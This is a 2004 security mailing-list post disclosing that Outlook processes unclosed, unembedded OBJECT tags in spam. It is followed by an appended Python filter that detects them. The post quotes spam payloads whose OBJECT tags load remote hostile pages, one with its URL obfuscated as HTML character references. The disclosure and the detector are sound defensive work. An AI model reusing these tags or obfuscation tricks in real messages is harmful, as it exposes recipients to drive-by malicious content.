Date: Mon, 7 Jun 2004 16:15:47 -0400
From: "James C Slora Jr" <Jim.Slora@...a.com>
To: <bugtraq@...urityfocus.com>
Subject: OBJECT Bugs or Features


Two questions about the recent OBJECT tag assault in spam messages:

1. Should an email client process an OBJECT tag that has no corresponding
/OBJECT?
2. Should an email client process an OBJECT tag that is not even embedded
within HTML tags? 

Apparently the current answer in Outlook is Yes. Two examples below leap to
the Web to download very hostile pages from fully patched, fully updated
Outlook 2000. I have not tested in other versions, but the volume of the
incoming spam with these tags suggests other versions are vulnerable too.

I don't think this is new ground, but it is very much wild now.

~ inserted in key places to reduce "you sent me spam" notices.

 
From: "Yesenia Edwards" <YMNUDEWDQHFZWU@...oo.com>
To: <blah@...h.blah>
Subject: the email from 2 days ago.. here is my replay..
Date: Mon, 07 Jun 2004 13:29:40 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--6941203962437317574"

----6941203962437317574
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

~object
data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20

----6941203962437317574--



Many other messages have Object tags that look like this:

~object =
data=3D"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#1=
19;&#105;&#108;&#100;&#119;&#105;&#110;&#99;&#97;&#115;&#105;&#110;&#111;=
&#46;&#110;&#101;&#116;&#47;&#112;&#97;&#103;&#101;&#46;&#112;&#104;&#112=
;"~

Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The
hostile site URL is often obfuscated through ASCII HTML encoding.
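
A mail-filter check for the pattern described in the message above, added here as an example and not part of the original post: it undoes the quoted-printable layer, then the HTML character references, and reports OBJECT tags whose data attribute is a remote URL, noting whether a closing tag or an enclosing HTML element is present. The function name, the finding fields and the sample bytes are assumptions constructed for illustration.

```python
import html
import quopri
import re

# Opening OBJECT tag; [^<>]* also matches a tag that never gets its '>'.
OBJECT_OPEN = re.compile(r"<object\b([^<>]*)", re.IGNORECASE)
OBJECT_CLOSE = re.compile(r"</object\s*>", re.IGNORECASE)
HTML_OPEN = re.compile(r"<html\b", re.IGNORECASE)
DATA_ATTR = re.compile(r"""\bdata\s*=\s*["']?([^"'\s<>]+)""", re.IGNORECASE)
REMOTE = re.compile(r"https?://", re.IGNORECASE)


def scan_html_part(raw_body: bytes) -> list:
    """Flag OBJECT tags in a quoted-printable text/html part that load a remote URL."""
    # Layer 1: quoted-printable. Soft line breaks ("=" at end of line) are
    # removed and "=3D" becomes "="; a stray "=" is passed through unchanged.
    text = quopri.decodestring(raw_body).decode("latin-1")
    findings = []
    for tag in OBJECT_OPEN.finditer(text):
        attr = DATA_ATTR.search(tag.group(1))
        if attr is None:
            continue
        raw_value = attr.group(1)
        # Layer 2: HTML character references (&#104; -> "h").
        url = html.unescape(raw_value)
        if not REMOTE.match(url):
            continue
        findings.append({
            "url": url,
            "entity_obfuscated": raw_value != url,
            "has_closing_tag": OBJECT_CLOSE.search(text, tag.end()) is not None,
            "inside_html": HTML_OPEN.search(text, 0, tag.start()) is not None,
        })
    return findings


# Constructed samples (not the messages from the post); example.invalid is a placeholder.
SAMPLE_PLAIN = b'<object data=3D"http://example.invalid/page.php" =20\r\n'
SAMPLE_ENCODED = (b'<object =\r\ndata="&#104;&#116;&#116;&#112;&#58;&#47;&#47;'
                  b'example.in=\r\nvalid/p">\r\n')
SAMPLE_BENIGN = (b'<html><body><object data=3D"logo.svg"></object>'
                 b'</body></html>\r\n')

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(scan_html_part(sample))
```

A filter built on this would treat a remote `data` URL combined with `has_closing_tag` or `inside_html` being false as the stronger signal, since a well-formed embedded object normally has both.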


